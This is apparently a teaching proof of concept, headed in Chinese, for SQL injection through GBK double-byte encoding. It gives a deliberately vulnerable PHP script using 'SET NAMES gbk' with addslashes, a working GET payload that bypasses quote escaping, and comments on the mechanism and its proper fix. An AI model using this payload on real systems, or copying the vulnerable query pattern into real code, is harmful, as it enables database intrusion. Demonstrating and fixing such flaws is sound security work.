利用GBK双字节编码突破PHP单引号转义限制进行SQL注入:set names gbk导致的sql注入
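<?php
// PoC: SQL injection through GBK double-byte encoding under "SET NAMES gbk".
// Lab/demo code only: ext/mysql (mysql_*) was removed in PHP 7, and the SQL
// is deliberately built by string concatenation so the bypass can be observed.
//
// Why the bypass works: after addslashes()/magic_quotes_gpc the payload
// "test\xd5' or id=1#" becomes "test\xd5\x5c' or id=1#". With the connection
// charset set to GBK, MySQL reads \xd5\x5c as ONE GBK character, so the
// backslash is swallowed and the following quote closes the string literal.
// Without that escaping step the quote would close the string trivially and
// the demo would not exercise the multibyte trick at all.

$conn = mysql_connect('localhost', 'root', '')
    or die("<font color=red>不能连接数据库!</font>");
$db = mysql_select_db('test', $conn);

// Vulnerable line: SET NAMES changes the charset the *server* uses to parse
// the statement, but the client library (and mysql_real_escape_string) still
// believes the old connection charset, so escaping is not GBK-aware.
mysql_query("set names 'gbk'");
// Alternative from the original post: keep client bytes binary so \xd5\x5c is
// never merged into one character. This blocks the multibyte bypass only when
// escaping is also in place; it is NOT a substitute for escaping/parameters.
//mysql_query("SET character_set_connection='gbk',character_set_results='gbk',character_set_client=binary");

// Untrusted input straight from the query string (missing index would
// otherwise raise a notice and still reach the query).
$username = isset($_GET['username']) ? $_GET['username'] : '';

// The single-quote escaping the GBK trick is meant to defeat. On PHP < 5.4
// with magic_quotes_gpc=On this happened implicitly; emulate it otherwise so
// the demo shows the bypass and not just an unescaped quote.
if (!get_magic_quotes_gpc()) {
    $username = addslashes($username);
}

$query = "select * from zp where class_id='27' and flag=0 and username='$username' order by id desc limit 1";
// Demo output only: echoing the statement shows the \xd5\x5c sequence that
// reaches the server. Never expose the raw query in production code.
echo $query;

$result = mysql_query($query);
if ($result === false) {
    // Demo only: surfacing mysql_error() to the client is an information
    // leak in real code, but here it shows why a mangled payload failed.
    die(mysql_error());
}
$row = mysql_fetch_array($result);
print_r($row);

// Proper fix: make the client library aware of the real charset so escaping
// is charset-aware -- mysql_set_charset('gbk', $conn) before
// mysql_real_escape_string() -- or, better, use mysqli/PDO prepared
// statements so user input never becomes part of the SQL text.
?>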
get变量:?username=test%d5%27%20or%20id=1%23 （URL 解码后为 test\xd5' or id=1# ；经 addslashes()/magic_quotes_gpc 转义后变为 test\xd5\x5c' or id=1# 。在 GBK 连接字符集下，MySQL 把 \xd5\x5c 当作一个双字节字符，反斜杠被"吃掉"，随后的单引号闭合字符串，# 注释掉剩余语句。注意：若代码中没有任何单引号转义，普通的 ' 即可注入，这个 %d5 前缀只有在存在转义时才是必要的。）
------------------------------
参考来源:http://hi.baidu.com/cdcxdzj/blog/item/43a514f7017711c3f3d38515.html